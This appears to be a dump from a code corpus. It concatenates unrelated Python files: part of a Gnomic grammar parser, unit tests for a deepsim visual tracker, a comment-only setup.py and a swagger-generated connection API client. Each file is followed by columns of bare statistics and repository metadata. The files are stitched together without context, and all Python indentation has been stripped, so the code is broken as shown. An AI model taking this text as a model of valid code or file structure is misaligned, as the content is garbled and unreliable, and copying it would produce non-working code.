self._pattern(r'[a-zA-Z0-9]+(\.[a-zA-Z0-9]+)?')
@graken()
def _ACCESSION_(self):
with self._choice():
with self._option():
self._token('#')
self._DATABASE_()
self.name_last_node('db')
self._token(':')
with self._group():
with self._choice():
with self._option():
self._INTEGER_()
with self._option():
self._IDENTIFIER_()
self._error('no available options')
self.name_last_node('id')
with self._option():
self._token('#')
with self._group():
with self._choice():
with self._option():
self._INTEGER_()
with self._option():
self._IDENTIFIER_()
self._error('no available options')
self.name_last_node('id')
self._error('no available options')
self.ast._define(
['db', 'id'],
[]
)
@graken()
def _DATABASE_(self):
self._pattern(r'[A-Za-z0-9-][A-Za-z0-9]+')
@graken()
def _INTEGER_(self):
self._pattern(r'[0-9]+')
self.name_last_node('@')
@graken()
def _FEATURE_VARIANT_(self):
self._token('(')
self._VARIANT_()
self.add_last_node_to_name('@')
def block1():
with self._group():
with self._choice():
with self._option():
self._token(',')
with self._option():
self._token(';')
self._error('expecting one of: , ;')
with self._optional():
self._SEP_()
self._VARIANT_()
self.add_last_node_to_name('@')
self._closure(block1)
self._token(')')
@graken()
def _VARIANT_(self):
with self._group():
with self._choice():
with self._option():
self._VARIABLE_VARIANT_()
with self._option():
self._SEQUENCE_VARIANT_()
with self._option():
self._VARIANT_IDENTIFIER_()
self._error('no available options')
@graken()
def _VARIANT_IDENTIFIER_(self):
self._pattern(r'[A-Za-z0-9]+([A-Za-z0-9_\-]+[A-Za-z0-9])?')
@graken()
def _IDENTIFIER_(self):
self._pattern(r'[a-zA-Z0-9]+([A-Za-z0-9_-]+[A-Za-z0-9])?')
@graken()
def _LIST_SEPARATOR_(self):
with self._group():
with self._choice():
with self._option():
self._SEP_()
with self._option():
self._token(',')
with self._optional():
self._SEP_()
self._error('expecting one of: ,')
@graken()
def _SEP_(self):
self._pattern(r'[\t ]+')
class GnomicSemantics(object):
def SEQUENCE_VARIANT(self, ast):
return ast
def DNA_SEQUENCE_VARIANT(self, ast):
return ast
def DEL_DUP(self, ast):
return ast
def NUCLEOTIDE(self, ast):
return ast
def NUCLEOTIDE_SEQUENCE(self, ast):
return ast
def PROTEIN_SEQUENCE_VARIANT(self, ast):
return ast
def AMINO_ACID(self, ast):
return ast
def AMINO_ACID_SEQUENCE(self, ast):
return ast
def VARIABLE_VARIANT(self, ast):
return ast
def VARIABLE_VARIANT_IDENTIFIER(self, ast):
return ast
def VARIABLE_VARIANT_VALUE(self, ast):
return ast
def NUMBER(self, ast):
return ast
def QUOTED_STRING(self, ast):
return ast
def UNQUOTED_STRING(self, ast):
return ast
def start(self, ast):
return ast
def CHANGE(self, ast):
return ast
def INSERTION(self, ast):
return ast
def REPLACEMENT(self, ast):
return ast
def DELETION(self, ast):
return ast
def PLASMID(self, ast):
return ast
def ANNOTATION_AT_LOCUS(self, ast):
return ast
def ANNOTATION(self, ast):
return ast
def ANNOTATIONS(self, ast):
return ast
def COMPOSITE_ANNOTATION(self, ast):
return ast
def FUSION(self, ast):
return ast
def FEATURE_FUSION(self, ast):
return ast
def FEATURE(self, ast):
return ast
def PHENE(self, ast):
return ast
def FEATURE_ORGANISM(self, ast):
return ast
def ORGANISM_IDENTIFIER(self, ast):
return ast
def ACCESSION(self, ast):
return ast
def DATABASE(self, ast):
return ast
def INTEGER(self, ast):
return ast
def FEATURE_VARIANT(self, ast):
return ast
def VARIANT(self, ast):
return ast
def VARIANT_IDENTIFIER(self, ast):
return ast
def IDENTIFIER(self, ast):
return ast
def LIST_SEPARATOR(self, ast):
return ast
def SEP(self, ast):
return ast
def main(filename, startrule, **kwargs):
with open(filename) as f:
text = f.read()
parser = GnomicParser(parseinfo=False)
return parser.parse(text, startrule, filename=filename, **kwargs)
if __name__ == '__main__':
import json
ast = generic_main(main, GnomicParser, name='Gnomic')
print('AST:')
print(ast)
print()
print('JSON:')
print(json.dumps(ast, indent=2))
print()
| 33.503515
| 82
| 0.417054
| 3,018
| 38,127
| 4.809145
| 0.062293
| 0.131735
| 0.136971
| 0.168665
| 0.836985
| 0.784277
| 0.717928
| 0.66081
| 0.623674
| 0.605484
| 0
| 0.002886
| 0.472867
| 38,127
| 1,137
| 83
| 33.532982
| 0.719276
| 0.006137
| 0
| 0.79922
| 1
| 0.002924
| 0.050314
| 0.00652
| 0
| 0
| 0
| 0
| 0
| 1
| 0.08577
| false
| 0
| 0.004873
| 0.038012
| 0.132554
| 0.006823
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
183086b4f2ed4d3cacd8eef48ebe4fdb36d63923
| 27,698
|
py
|
Python
|
deepsim/test/test_deepsim/sim_trackers/trackers/test_get_visual_tracker.py
|
aws-deepracer/deepsim
|
cad2639f525c2f94ec5c03d8b855cc65b0b8ee55
|
[
"Apache-2.0"
] | 1
|
2022-03-25T07:20:49.000Z
|
2022-03-25T07:20:49.000Z
|
deepsim/test/test_deepsim/sim_trackers/trackers/test_get_visual_tracker.py
|
aws-deepracer/deepsim
|
cad2639f525c2f94ec5c03d8b855cc65b0b8ee55
|
[
"Apache-2.0"
] | null | null | null |
deepsim/test/test_deepsim/sim_trackers/trackers/test_get_visual_tracker.py
|
aws-deepracer/deepsim
|
cad2639f525c2f94ec5c03d8b855cc65b0b8ee55
|
[
"Apache-2.0"
] | null | null | null |
#################################################################################
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. #
# #
# Licensed under the Apache License, Version 2.0 (the "License"). #
# You may not use this file except in compliance with the License. #
# You may obtain a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
#################################################################################
from typing import Any, Callable
from unittest import TestCase
from unittest.mock import patch, MagicMock, call
import inspect
from deepsim.sim_trackers.trackers.get_visual_tracker import GetVisualTracker
from deepsim.gazebo.constants import GazeboTopicName, GazeboServiceName, GeometryType
from deepsim.core.color import Color
from deepsim.core.vector3 import Vector3
from deepsim.core.pose import Pose
from deepsim.core.quaternion import Quaternion
from deepsim.core.visual import Visual
from deepsim.core.material import Material
from deepsim.exception import DeepSimException
from deepsim_msgs.srv import (
GetVisuals, GetVisualsResponse,
GetAllVisuals, GetAllVisualsResponse
)
from deepsim_msgs.msg import Visuals
myself: Callable[[], Any] = lambda: inspect.stack()[1][3]
@patch("deepsim.sim_trackers.trackers.get_visual_tracker.ServiceProxyWrapper")
class GetVisualTrackerTest(TestCase):
def setUp(self) -> None:
get_visuals_mock = MagicMock()
get_all_visuals_mock = MagicMock()
def get_service_mock(service_name, service_type):
if service_name == GazeboServiceName.GET_VISUALS:
return get_visuals_mock
elif service_name == GazeboServiceName.GET_ALL_VISUALS:
return get_all_visuals_mock
else:
return Exception()
self.get_visuals_mock = get_visuals_mock
self.get_all_visuals_mock = get_all_visuals_mock
self.get_service_mock = get_service_mock
def test_initialize(self, service_proxy_wrapper_mock):
_ = GetVisualTracker(is_singleton=False)
service_proxy_wrapper_mock.assert_has_calls([
call(GazeboServiceName.GET_VISUALS, GetVisuals),
call(GazeboServiceName.GET_ALL_VISUALS, GetAllVisuals)
])
def test_on_update_tracker(self, service_proxy_wrapper_mock):
link_name1 = myself() + "1"
visual_name1 = myself() + "1_visual"
ambient1 = Color(0.1, 0.2, 0.3, 0.4)
diffuse1 = Color(0.2, 0.3, 0.4, 0.5)
specular1 = Color(0.3, 0.4, 0.5, 0.6)
emissive1 = Color(0.4, 0.5, 0.6, 0.7)
transparency1 = 0.3
visible1 = True
geometry_type1 = GeometryType.MESH
mesh_geom_filename1 = myself() + "_mesh_geom_filename1"
mesh_geom_scale1 = Vector3(1.0, 2.0, 3.0)
pose1 = Pose(position=Vector3(2.0, 3.0, 4.0),
orientation=Quaternion(3.0, 4.0, 5.0, 6.0))
link_name2 = myself() + "2"
visual_name2 = myself() + "2_visual"
ambient2 = Color(0.2, 0.2, 0.3, 0.4)
diffuse2 = Color(0.3, 0.3, 0.4, 0.5)
specular2 = Color(0.4, 0.4, 0.5, 0.6)
emissive2 = Color(0.5, 0.5, 0.6, 0.7)
transparency2 = 0.5
visible2 = True
geometry_type2 = GeometryType.BOX
mesh_geom_filename2 = myself() + "_mesh_geom_filename2"
mesh_geom_scale2 = Vector3(2.0, 2.0, 3.0)
pose2 = Pose(position=Vector3(3.0, 3.0, 4.0),
orientation=Quaternion(4.0, 4.0, 5.0, 6.0))
expected_visual1 = Visual(link_name=link_name1,
visual_name=visual_name1,
material=Material(ambient=ambient1,
diffuse=diffuse1,
specular=specular1,
emissive=emissive1),
transparency=transparency1,
visible=visible1,
geometry_type=geometry_type1,
mesh_geom_filename=mesh_geom_filename1,
mesh_geom_scale=mesh_geom_scale1,
pose=pose1)
expected_visual2 = Visual(link_name=link_name2,
visual_name=visual_name2,
material=Material(ambient=ambient2,
diffuse=diffuse2,
specular=specular2,
emissive=emissive2),
transparency=transparency2,
visible=visible2,
geometry_type=geometry_type2,
mesh_geom_filename=mesh_geom_filename2,
mesh_geom_scale=mesh_geom_scale2,
pose=pose2)
res = GetAllVisualsResponse()
res.success = True
res.status_message = ''
res.visuals = [expected_visual1.to_ros(),
expected_visual2.to_ros()]
service_proxy_wrapper_mock.side_effect = self.get_service_mock
self.get_all_visuals_mock.return_value = res
tracker = GetVisualTracker(is_singleton=False)
tracker.on_update_tracker(0.1, None)
assert (link_name1, visual_name1) in tracker._visual_map
assert (link_name2, visual_name2) in tracker._visual_map
assert expected_visual1 == tracker._visual_map[(link_name1, visual_name1)]
assert expected_visual2 == tracker._visual_map[(link_name2, visual_name2)]
def test_get_visual(self, service_proxy_wrapper_mock):
link_name1 = myself() + "1"
visual_name1 = myself() + "1_visual"
ambient1 = Color(0.1, 0.2, 0.3, 0.4)
diffuse1 = Color(0.2, 0.3, 0.4, 0.5)
specular1 = Color(0.3, 0.4, 0.5, 0.6)
emissive1 = Color(0.4, 0.5, 0.6, 0.7)
transparency1 = 0.3
visible1 = True
geometry_type1 = GeometryType.MESH
mesh_geom_filename1 = myself() + "_mesh_geom_filename1"
mesh_geom_scale1 = Vector3(1.0, 2.0, 3.0)
pose1 = Pose(position=Vector3(2.0, 3.0, 4.0),
orientation=Quaternion(3.0, 4.0, 5.0, 6.0))
link_name2 = myself() + "2"
visual_name2 = myself() + "2_visual"
ambient2 = Color(0.2, 0.2, 0.3, 0.4)
diffuse2 = Color(0.3, 0.3, 0.4, 0.5)
specular2 = Color(0.4, 0.4, 0.5, 0.6)
emissive2 = Color(0.5, 0.5, 0.6, 0.7)
transparency2 = 0.5
visible2 = True
geometry_type2 = GeometryType.BOX
mesh_geom_filename2 = myself() + "_mesh_geom_filename2"
mesh_geom_scale2 = Vector3(2.0, 2.0, 3.0)
pose2 = Pose(position=Vector3(3.0, 3.0, 4.0),
orientation=Quaternion(4.0, 4.0, 5.0, 6.0))
expected_visual1 = Visual(link_name=link_name1,
visual_name=visual_name1,
material=Material(ambient=ambient1,
diffuse=diffuse1,
specular=specular1,
emissive=emissive1),
transparency=transparency1,
visible=visible1,
geometry_type=geometry_type1,
mesh_geom_filename=mesh_geom_filename1,
mesh_geom_scale=mesh_geom_scale1,
pose=pose1)
expected_visual2 = Visual(link_name=link_name2,
visual_name=visual_name2,
material=Material(ambient=ambient2,
diffuse=diffuse2,
specular=specular2,
emissive=emissive2),
transparency=transparency2,
visible=visible2,
geometry_type=geometry_type2,
mesh_geom_filename=mesh_geom_filename2,
mesh_geom_scale=mesh_geom_scale2,
pose=pose2)
res = GetAllVisualsResponse()
res.success = True
res.status_message = ''
res.visuals = [expected_visual1.to_ros(),
expected_visual2.to_ros()]
service_proxy_wrapper_mock.side_effect = self.get_service_mock
self.get_all_visuals_mock.return_value = res
tracker = GetVisualTracker(is_singleton=False)
tracker.on_update_tracker(0.1, None)
visual1 = tracker.get_visual(link_name1, visual_name1)
visual2 = tracker.get_visual(link_name2, visual_name2)
assert visual1 == expected_visual1
assert visual2 == expected_visual2
# Check returned visual is a copy
assert tracker._visual_map[(link_name1, visual_name1)] == visual1
assert tracker._visual_map[(link_name1, visual_name1)] is not visual1
assert tracker._visual_map[(link_name2, visual_name2)] == visual2
assert tracker._visual_map[(link_name2, visual_name2)] is not visual2
self.get_visuals_mock.assert_not_called()
def test_get_visual_blocking(self, service_proxy_wrapper_mock):
link_name = myself()
visual_name = myself() + "_visual"
ambient = Color(0.1, 0.2, 0.3, 0.4)
diffuse = Color(0.2, 0.3, 0.4, 0.5)
specular = Color(0.3, 0.4, 0.5, 0.6)
emissive = Color(0.4, 0.5, 0.6, 0.7)
transparency = 0.3
visible = True
geometry_type = GeometryType.MESH
mesh_geom_filename = myself() + "_mesh_geom_filename1"
mesh_geom_scale = Vector3(1.0, 2.0, 3.0)
pose = Pose(position=Vector3(2.0, 3.0, 4.0),
orientation=Quaternion(3.0, 4.0, 5.0, 6.0))
expected_visual = Visual(link_name=link_name,
visual_name=visual_name,
material=Material(ambient=ambient,
diffuse=diffuse,
specular=specular,
emissive=emissive),
transparency=transparency,
visible=visible,
geometry_type=geometry_type,
mesh_geom_filename=mesh_geom_filename,
mesh_geom_scale=mesh_geom_scale,
pose=pose)
res = GetVisualsResponse()
res.status = [True]
res.success = True
res.visuals = [expected_visual.to_ros()]
service_proxy_wrapper_mock.side_effect = self.get_service_mock
self.get_visuals_mock.return_value = res
tracker = GetVisualTracker(is_singleton=False)
visual = tracker.get_visual(link_name, visual_name, blocking=True)
self.get_visuals_mock.assert_called_once_with([link_name], [visual_name])
assert visual == expected_visual
def test_get_visual_missing_in_dict(self, service_proxy_wrapper_mock):
link_name = myself()
visual_name = myself() + "_visual"
ambient = Color(0.1, 0.2, 0.3, 0.4)
diffuse = Color(0.2, 0.3, 0.4, 0.5)
specular = Color(0.3, 0.4, 0.5, 0.6)
emissive = Color(0.4, 0.5, 0.6, 0.7)
transparency = 0.3
visible = True
geometry_type = GeometryType.MESH
mesh_geom_filename = myself() + "_mesh_geom_filename1"
mesh_geom_scale = Vector3(1.0, 2.0, 3.0)
pose = Pose(position=Vector3(2.0, 3.0, 4.0),
orientation=Quaternion(3.0, 4.0, 5.0, 6.0))
expected_visual = Visual(link_name=link_name,
visual_name=visual_name,
material=Material(ambient=ambient,
diffuse=diffuse,
specular=specular,
emissive=emissive),
transparency=transparency,
visible=visible,
geometry_type=geometry_type,
mesh_geom_filename=mesh_geom_filename,
mesh_geom_scale=mesh_geom_scale,
pose=pose)
res = GetVisualsResponse()
res.status = [True]
res.success = True
res.visuals = [expected_visual.to_ros()]
service_proxy_wrapper_mock.side_effect = self.get_service_mock
self.get_visuals_mock.return_value = res
tracker = GetVisualTracker(is_singleton=False)
visual = tracker.get_visual(link_name, visual_name)
self.get_visuals_mock.assert_called_once_with([link_name], [visual_name])
assert visual == expected_visual
def test_get_visual_missing_and_failed_to_retrieve(self, service_proxy_wrapper_mock):
link_name = myself()
visual_name = myself() + "_visual"
res = GetVisualsResponse()
res.status = [False]
res.success = False
res.visuals = [None]
res.messages = ["Failed"]
service_proxy_wrapper_mock.side_effect = self.get_service_mock
self.get_visuals_mock.return_value = res
tracker = GetVisualTracker(is_singleton=False)
with self.assertRaises(DeepSimException):
tracker.get_visual(link_name, visual_name)
res.status = [False]
res.success = True
with self.assertRaises(DeepSimException):
tracker.get_visual(link_name, visual_name)
res.status = [True]
res.success = False
with self.assertRaises(DeepSimException):
tracker.get_visual(link_name, visual_name)
self.get_visuals_mock.has_calls(
call([link_name], [visual_name]),
call([link_name], [visual_name]),
call([link_name], [visual_name])
)
def test_get_visuals(self, service_proxy_wrapper_mock):
link_name1 = myself() + "1"
visual_name1 = myself() + "1_visual"
ambient1 = Color(0.1, 0.2, 0.3, 0.4)
diffuse1 = Color(0.2, 0.3, 0.4, 0.5)
specular1 = Color(0.3, 0.4, 0.5, 0.6)
emissive1 = Color(0.4, 0.5, 0.6, 0.7)
transparency1 = 0.3
visible1 = True
geometry_type1 = GeometryType.MESH
mesh_geom_filename1 = myself() + "_mesh_geom_filename1"
mesh_geom_scale1 = Vector3(1.0, 2.0, 3.0)
pose1 = Pose(position=Vector3(2.0, 3.0, 4.0),
orientation=Quaternion(3.0, 4.0, 5.0, 6.0))
link_name2 = myself() + "2"
visual_name2 = myself() + "2_visual"
ambient2 = Color(0.2, 0.2, 0.3, 0.4)
diffuse2 = Color(0.3, 0.3, 0.4, 0.5)
specular2 = Color(0.4, 0.4, 0.5, 0.6)
emissive2 = Color(0.5, 0.5, 0.6, 0.7)
transparency2 = 0.5
visible2 = True
geometry_type2 = GeometryType.BOX
mesh_geom_filename2 = myself() + "_mesh_geom_filename2"
mesh_geom_scale2 = Vector3(2.0, 2.0, 3.0)
pose2 = Pose(position=Vector3(3.0, 3.0, 4.0),
orientation=Quaternion(4.0, 4.0, 5.0, 6.0))
expected_visual1 = Visual(link_name=link_name1,
visual_name=visual_name1,
material=Material(ambient=ambient1,
diffuse=diffuse1,
specular=specular1,
emissive=emissive1),
transparency=transparency1,
visible=visible1,
geometry_type=geometry_type1,
mesh_geom_filename=mesh_geom_filename1,
mesh_geom_scale=mesh_geom_scale1,
pose=pose1)
expected_visual2 = Visual(link_name=link_name2,
visual_name=visual_name2,
material=Material(ambient=ambient2,
diffuse=diffuse2,
specular=specular2,
emissive=emissive2),
transparency=transparency2,
visible=visible2,
geometry_type=geometry_type2,
mesh_geom_filename=mesh_geom_filename2,
mesh_geom_scale=mesh_geom_scale2,
pose=pose2)
res = GetAllVisualsResponse()
res.success = True
res.status_message = ''
res.visuals = [expected_visual1.to_ros(),
expected_visual2.to_ros()]
service_proxy_wrapper_mock.side_effect = self.get_service_mock
self.get_all_visuals_mock.return_value = res
tracker = GetVisualTracker(is_singleton=False)
tracker.on_update_tracker(0.1, None)
visual_map = tracker.get_visuals([link_name1, link_name2],
[visual_name1, visual_name2])
key1 = (link_name1, visual_name1)
key2 = (link_name2, visual_name2)
expected_visuals = {key1: expected_visual1,
key2: expected_visual2}
assert visual_map == expected_visuals
self.get_visuals_mock.assert_not_called()
def test_get_visuals_blocking(self, service_proxy_wrapper_mock):
link_name = myself()
visual_name = myself() + "_visual"
ambient = Color(0.1, 0.2, 0.3, 0.4)
diffuse = Color(0.2, 0.3, 0.4, 0.5)
specular = Color(0.3, 0.4, 0.5, 0.6)
emissive = Color(0.4, 0.5, 0.6, 0.7)
transparency = 0.3
visible = True
geometry_type = GeometryType.MESH
mesh_geom_filename = myself() + "_mesh_geom_filename1"
mesh_geom_scale = Vector3(1.0, 2.0, 3.0)
pose = Pose(position=Vector3(2.0, 3.0, 4.0),
orientation=Quaternion(3.0, 4.0, 5.0, 6.0))
expected_visual = Visual(link_name=link_name,
visual_name=visual_name,
material=Material(ambient=ambient,
diffuse=diffuse,
specular=specular,
emissive=emissive),
transparency=transparency,
visible=visible,
geometry_type=geometry_type,
mesh_geom_filename=mesh_geom_filename,
mesh_geom_scale=mesh_geom_scale,
pose=pose)
key = (link_name, visual_name)
expected_return = {key: expected_visual}
res = GetVisualsResponse()
res.status = [True]
res.success = True
res.visuals = [expected_visual.to_ros()]
service_proxy_wrapper_mock.side_effect = self.get_service_mock
self.get_visuals_mock.return_value = res
tracker = GetVisualTracker(is_singleton=False)
visuals = tracker.get_visuals([link_name], [visual_name], blocking=True)
self.get_visuals_mock.assert_called_once_with([link_name], [visual_name])
assert visuals == expected_return
def test_get_visuals_missing_in_dict(self, service_proxy_wrapper_mock):
link_name = myself()
visual_name = myself() + "_visual"
ambient = Color(0.1, 0.2, 0.3, 0.4)
diffuse = Color(0.2, 0.3, 0.4, 0.5)
specular = Color(0.3, 0.4, 0.5, 0.6)
emissive = Color(0.4, 0.5, 0.6, 0.7)
transparency = 0.3
visible = True
geometry_type = GeometryType.MESH
mesh_geom_filename = myself() + "_mesh_geom_filename1"
mesh_geom_scale = Vector3(1.0, 2.0, 3.0)
pose = Pose(position=Vector3(2.0, 3.0, 4.0),
orientation=Quaternion(3.0, 4.0, 5.0, 6.0))
expected_visual = Visual(link_name=link_name,
visual_name=visual_name,
material=Material(ambient=ambient,
diffuse=diffuse,
specular=specular,
emissive=emissive),
transparency=transparency,
visible=visible,
geometry_type=geometry_type,
mesh_geom_filename=mesh_geom_filename,
mesh_geom_scale=mesh_geom_scale,
pose=pose)
key = (link_name, visual_name)
expected_return = {key: expected_visual}
res = GetVisualsResponse()
res.status = [True]
res.success = True
res.visuals = [expected_visual.to_ros()]
service_proxy_wrapper_mock.side_effect = self.get_service_mock
self.get_visuals_mock.return_value = res
tracker = GetVisualTracker(is_singleton=False)
visuals = tracker.get_visuals([link_name], [visual_name])
self.get_visuals_mock.assert_called_once_with([link_name], [visual_name])
assert visuals == expected_return
def test_get_visuals_missing_and_failed_to_retrieve(self, service_proxy_wrapper_mock):
link_name = myself()
visual_name = myself() + "_visual"
res = GetVisualsResponse()
res.status = [False]
res.success = False
res.visuals = [None]
res.messages = ["Failed"]
service_proxy_wrapper_mock.side_effect = self.get_service_mock
self.get_visuals_mock.return_value = res
tracker = GetVisualTracker(is_singleton=False)
with self.assertRaises(DeepSimException):
tracker.get_visuals([link_name], [visual_name])
res.status = [False]
res.success = True
assert tracker.get_visuals([link_name], [visual_name]) == {(link_name, visual_name): None}
res.status = [True]
res.success = False
with self.assertRaises(DeepSimException):
tracker.get_visuals([link_name], [visual_name])
self.get_visuals_mock.has_calls(
call([link_name], [visual_name]),
call([link_name], [visual_name]),
call([link_name], [visual_name])
)
def test_get_visuals_unmatched_length(self, service_proxy_wrapper_mock):
tracker = GetVisualTracker(is_singleton=False)
link_name = myself()
with self.assertRaises(ValueError):
tracker.get_visuals([link_name], [])
def test_set_material(self, service_proxy_wrapper_mock):
tracker = GetVisualTracker(is_singleton=False)
link_name = myself()
visual_name = myself() + '_visual'
key = (link_name, visual_name)
tracker._visual_map[key] = Visual()
expected_material = Material(ambient=Color(1.0, 2.0, 3.0))
tracker.set_material(link_name=link_name,
visual_name=visual_name,
material=expected_material)
assert expected_material == tracker.get_visual(link_name=link_name,
visual_name=visual_name).material
def test_set_material_visual_not_in_map(self, service_proxy_wrapper_mock):
tracker = GetVisualTracker(is_singleton=False)
link_name = myself()
visual_name = myself() + '_visual'
key = (link_name, visual_name)
new_material = Material(ambient=Color(1.0, 2.0, 3.0))
tracker.set_material(link_name=link_name,
visual_name=visual_name,
material=new_material)
assert key not in tracker._visual_map
def test_set_transparency(self, service_proxy_wrapper_mock):
tracker = GetVisualTracker(is_singleton=False)
link_name = myself()
visual_name = myself() + '_visual'
key = (link_name, visual_name)
tracker._visual_map[key] = Visual()
expected_transparency = 0.5
tracker.set_transparency(link_name=link_name,
visual_name=visual_name,
transparency=expected_transparency)
assert expected_transparency == tracker.get_visual(link_name=link_name,
visual_name=visual_name).transparency
def test_set_transparency_visual_not_in_map(self, service_proxy_wrapper_mock):
tracker = GetVisualTracker(is_singleton=False)
link_name = myself()
visual_name = myself() + '_visual'
key = (link_name, visual_name)
new_transparency = 0.5
tracker.set_transparency(link_name=link_name,
visual_name=visual_name,
transparency=new_transparency)
assert key not in tracker._visual_map
def test_set_visible(self, service_proxy_wrapper_mock):
tracker = GetVisualTracker(is_singleton=False)
link_name = myself()
visual_name = myself() + '_visual'
key = (link_name, visual_name)
tracker._visual_map[key] = Visual()
expected_visible = False
tracker.set_visible(link_name=link_name,
visual_name=visual_name,
visible=expected_visible)
assert expected_visible == tracker.get_visual(link_name=link_name,
visual_name=visual_name).visible
def test_set_visible_visual_not_in_map(self, service_proxy_wrapper_mock):
tracker = GetVisualTracker(is_singleton=False)
link_name = myself()
visual_name = myself() + '_visual'
key = (link_name, visual_name)
new_visible = False
tracker.set_visible(link_name=link_name,
visual_name=visual_name,
visible=new_visible)
assert key not in tracker._visual_map
| 44.387821
| 98
| 0.545382
| 2,962
| 27,698
| 4.82208
| 0.07056
| 0.042008
| 0.05391
| 0.05293
| 0.827417
| 0.819156
| 0.816425
| 0.800952
| 0.78919
| 0.78786
| 0
| 0.046321
| 0.36555
| 27,698
| 623
| 99
| 44.459069
| 0.76646
| 0.038126
| 0
| 0.800391
| 0
| 0
| 0.015803
| 0.002571
| 0
| 0
| 0
| 0
| 0.068493
| 1
| 0.037182
| false
| 0
| 0.029354
| 0
| 0.074364
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
43ea2617d9cfa592f1a11be2013c9c3e182350ea
| 214
|
py
|
Python
|
setup.py
|
PayThePizzo/OCR
|
900940ed29e1bcba9e30b77603f5de4738d856be
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
PayThePizzo/OCR
|
900940ed29e1bcba9e30b77603f5de4738d856be
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
PayThePizzo/OCR
|
900940ed29e1bcba9e30b77603f5de4738d856be
|
[
"Apache-2.0"
] | null | null | null |
# TODO: Create setup
# https://docs.python.org/3/distutils/setupscript.html
# https://docs.python.org/2/distutils/index.html
# https://docs.python.org/3/distutils/
# https://docs.python-guide.org/writing/structure/
| 42.8
| 54
| 0.757009
| 32
| 214
| 5.0625
| 0.5
| 0.222222
| 0.37037
| 0.333333
| 0.506173
| 0.345679
| 0
| 0
| 0
| 0
| 0
| 0.014778
| 0.051402
| 214
| 5
| 55
| 42.8
| 0.783251
| 0.953271
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0.2
| null | 1
| null | true
| 0
| 0
| null | null | null | 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a11ae6d6a81f32f4184c9aeb79cb56b58ba4f98f
| 12,018
|
py
|
Python
|
swagger_client/api/connection_api.py
|
atlanticwave-sdx/sdx-controller-client
|
426453bf84e9522e857fd78139bb63429b9091cc
|
[
"MIT"
] | null | null | null |
swagger_client/api/connection_api.py
|
atlanticwave-sdx/sdx-controller-client
|
426453bf84e9522e857fd78139bb63429b9091cc
|
[
"MIT"
] | null | null | null |
swagger_client/api/connection_api.py
|
atlanticwave-sdx/sdx-controller-client
|
426453bf84e9522e857fd78139bb63429b9091cc
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
SDX-Controller
You can find out more about Swagger at [http://swagger.io](http://swagger.io) or on [irc.freenode.net, #swagger](http://swagger.io/irc/). # noqa: E501
OpenAPI spec version: 1.0.0
Contact: yxin@renci.org
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from swagger_client.api_client import ApiClient
class ConnectionApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def delete_connection(self, connection_id, **kwargs): # noqa: E501
"""Delete connection order by ID # noqa: E501
delete a connection # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_connection(connection_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int connection_id: ID of the connection that needs to be deleted (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_connection_with_http_info(connection_id, **kwargs) # noqa: E501
else:
(data) = self.delete_connection_with_http_info(connection_id, **kwargs) # noqa: E501
return data
def delete_connection_with_http_info(self, connection_id, **kwargs): # noqa: E501
"""Delete connection order by ID # noqa: E501
delete a connection # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_connection_with_http_info(connection_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int connection_id: ID of the connection that needs to be deleted (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['connection_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_connection" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'connection_id' is set
if ('connection_id' not in params or
params['connection_id'] is None):
raise ValueError("Missing the required parameter `connection_id` when calling `delete_connection`") # noqa: E501
collection_formats = {}
path_params = {}
if 'connection_id' in params:
path_params['connectionId'] = params['connection_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/connection/{connectionId}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
